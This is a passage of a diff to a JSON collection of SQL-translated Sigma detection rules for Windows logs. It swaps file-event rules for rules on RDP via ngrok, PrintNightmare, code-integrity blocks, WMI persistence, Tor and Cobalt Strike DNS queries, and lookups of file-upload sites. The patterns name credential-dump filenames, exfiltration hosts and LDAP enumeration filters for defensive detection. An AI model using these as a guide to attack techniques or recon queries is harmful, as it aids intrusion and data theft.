LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" ], - "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" + "filename": "win_terminalservices_rdp_ngrok.yml" }, { - "title": "Suspicious Appended Extension", - "id": "e3f673b3-65d1-4d80-9146-466f8b63fa99", - "status": "experimental", - "description": "Detects possible ransomware adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\" etc.", - "author": "frack113", + "title": "CVE-2021-1675 Print Spooler Exploitation", + "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", + "status": "test", + "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1486" + "attack.execution", + "attack.t1569", + "cve.2021.1675" ], "falsepositives": [ - "Backup software" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (((SourceFilename LIKE '%.lnk' ESCAPE '\\' OR SourceFilename LIKE '%.rtf' ESCAPE '\\' OR SourceFilename LIKE '%.pst' ESCAPE '\\' OR SourceFilename LIKE '%.docx' ESCAPE '\\' OR SourceFilename LIKE '%.xlsx' ESCAPE '\\' OR SourceFilename LIKE '%.jpg' ESCAPE '\\' OR SourceFilename LIKE '%.jpeg' ESCAPE '\\' OR SourceFilename LIKE '%.png' ESCAPE '\\' OR SourceFilename LIKE '%.pdf' ESCAPE '\\') AND (TargetFilename LIKE '%.lnk.%' ESCAPE '\\' OR TargetFilename LIKE '%.rtf.%' ESCAPE '\\' OR TargetFilename LIKE '%.pst.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg.%' ESCAPE '\\' OR TargetFilename LIKE '%.png.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.old' ESCAPE '\\' OR TargetFilename LIKE '%.orig' ESCAPE '\\' OR TargetFilename LIKE '%.backup' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.c~' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" ], - "filename": "file_rename_win_ransomware.yml" + "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" }, { - "title": "Rename Common File to DLL File", - "id": "bbfd974c-248e-4435-8de6-1e938c79c5c1", + "title": "Code Integrity Attempted DLL Load", + "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", + "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "status": "experimental", - "description": "Detects cases in which a file gets renamed to .dll, which often happens to bypass perimeter protection", - "author": "frack113", + "tags": [ + "attack.execution" + ], "falsepositives": [ - "Application installation" + "Antivirus products" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.dll' ESCAPE '\\' AND NOT (((SourceFilename LIKE '%.dll' ESCAPE '\\' OR SourceFilename LIKE '%.tmp' ESCAPE '\\') OR (SourceFilename LIKE '%.dll.%' ESCAPE '\\' OR SourceFilename LIKE '%\\\\SquirrelTemp\\\\temp%' ESCAPE '\\')) OR (SourceFilename = '') OR (SourceFilename = '') OR (NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\assembly\\\\GAC\\\\%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy IN ('1', '2')) OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" ], - "filename": "file_rename_win_not_dll_to_dll.yml" + "filename": "win_codeintegrity_attempted_dll_load.yml" }, { - "title": "Suspicious NTDS Exfil Filename Patterns", - "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", - "status": "test", - "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", - "author": "Florian Roth (Nextron Systems)", + "title": "Block Load Of Revoked Driver", + "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", + "description": "Detects blocked load attempts of revoked drivers", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "status": "experimental", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" ], - "filename": "file_event_win_ntds_exfil_tools.yml" + "filename": "win_codeintegrity_revoked_driver.yml" }, { - "title": "SCR File Write Event", - "id": "c048f047-7e2a-4888-b302-55f509d4a91d", + "title": "Code Integrity Blocked Driver Load", + "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", + "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", + "author": "Nasreddine Bencherchali (Nextron Systems)", "status": "experimental", - "description": "Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an \".SCR\" file using \"rundll32.exe desk.cpl,InstallScreenSaver\" for example.", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ - "The installation of new screen savers by third party software" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE ':\\\\WUDownloadCache\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" ], - "filename": "file_event_win_new_src_file.yml" + "filename": "win_codeintegrity_blocked_driver_load.yml" }, { - "title": "Office Template Creation", - "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "title": "OpenSSH Server Listening On Socket", + "id": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", "status": "experimental", - "description": "Detects creation of template files for Microsoft Office from outside Office", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.", + "author": "mdecrevoisier", "tags": [ - "attack.persistence", - "attack.t1137" + "attack.lateral_movement", + "attack.t1021.004" ], "falsepositives": [ - "Loading a user environment from a backup or a domain controller", - "Synchronization of templates" + "Legitimate administrator activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4' AND process = 'sshd' AND payload LIKE 'Server listening on %' ESCAPE '\\')" ], - "filename": "file_event_win_word_template_creation.yml" + "filename": "win_sshd_openssh_server_listening_on_socket.yml" }, { - "title": "Advanced IP Scanner - File Event", - "id": "fed85bf9-e075-4280-9159-fbe8a023d6fa", + "title": "WMI Persistence", + "id": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", "status": "test", - "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", - "author": "@ROxPinTeddy", + "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ - "Legitimate administrative use" + "Unknown (data set is too small; further testing needed)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Advanced IP Scanner 2%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (((EventID = '5861' AND (logs MATCH ('\"ActiveScriptEventConsumer\" OR \"CommandLineEventConsumer\" OR \"CommandLineTemplate\"'))) OR EventID = '5859') AND NOT (Provider = 'SCM Event Provider' AND Query LIKE 'select % from MSFT\\_SCMEventLogEvent' ESCAPE '\\' AND User = 'S-1-5-32-544' AND PossibleCause = 'Permanent'))" ], - "filename": "file_event_win_advanced_ip_scanner.yml" + "filename": "win_wmi_persistence.yml" }, { - "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", - "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "title": "Query Tor Onion Address - DNS Client", + "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", "status": "test", - "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects DNS resolution of an .onion address related to Tor routing networks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ - "Unknown", - "Possibly some Microsoft Edge upgrades" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" ], - "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" + "filename": "win_dns_client_tor_onion.yml" }, { - "title": "Legitimate Application Dropped Executable", - "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", + "title": "DNS Query for Ufile.io Upload Domain - DNS Client", + "id": "090ffaad-c01a-4879-850c-6d57da98452d", "status": "experimental", - "description": "Detects programs on a Windows system that should not write executables to disk", - "author": "frack113, Florian Roth", + "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_exe.yml" + "filename": "win_dns_client_ufile_io.yml" }, { - "title": "Hijack Legit RDP Session to Move Laterally", - "id": "52753ea4-b3a0-4365-910d-36cff487b789", + "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", + "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", "status": "test", - "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", - "author": "Samir Bousseaden", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1219" + "attack.t1071.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" ], - "filename": "file_event_win_tsclient_filewrite_startup.yml" + "filename": "win_dns_client__mal_cobaltstrike.yml" }, { - "title": "Suspicious ASPX File Drop by Exchange", - "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", - "status": "experimental", - "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", - "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", + "title": "DNS Query for MEGA.io Upload Domain - DNS Client", + "id": "66474410-b883-415f-9f8d-75345a0a66a6", + "status": "test", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" ], - "filename": "file_event_win_exchange_webshell_drop.yml" + "filename": "win_dns_client_mega_nz.yml" }, { - "title": "Creation of an Executable by an Executable", - "id": "297afac9-5d02-4138-8c58-b977bac60556", + "title": "DNS Query for Anonfiles.com Domain - DNS Client", + "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", "status": "experimental", - "description": "Detects the creation of an executable by another executable", - "author": "frack113", + "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Software installers", - "Update utilities", - "32bit applications launching their 64bit versions" + "Rare legitimate access to anonfiles.com" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%.exe' ESCAPE '\\' AND TargetFilename LIKE '%.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\cleanmgr.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\dxgiadaptercache.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\Dism.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%:\\\\WUDownloadCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WindowsUpdateBox.exe%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\WindowsUpdateBox.Exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\Microsoft\\\\WindowsApps\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Squirrel.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\SquirrelTemp\\\\tempb\\\\' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\assembly\\\\NativeImages\\_%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.vscode\\\\extensions\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\Update.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\SquirrelTemp\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_dropper.yml" + "filename": "win_dns_client_anonymfiles_com.yml" }, { - "title": "File Creation In Suspicious Directory By Msdt.EXE", - "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "title": "Potential Active Directory Reconnaissance/Enumeration Via LDAP", + "id": "31d68132-4038-47c7-8f8e-635a39a7c174", + "status": "test", + "description": "Detects potential Active Directory enumeration via LDAP", + "author": "Adeem Mawani", + "tags": [ + "attack.discovery", + "attack.t1069.002", + "attack.t1087.002", + "attack.t1482" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (((EventID = '30' AND (SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483648)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483656)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483652)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483650)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306369)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306368)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870913)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870912)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435457)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435456)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=groupPolicyContainer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=organizationalUnit)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=Computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=nTDSDSA)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=domain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=person)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=trustedDomain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=521)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=516)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=515)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=512)%' ESCAPE '\\' OR SearchFilter LIKE '%Domain Admins%' ESCAPE '\\' OR SearchFilter LIKE '%objectGUID=\\*' ESCAPE '\\' OR SearchFilter LIKE 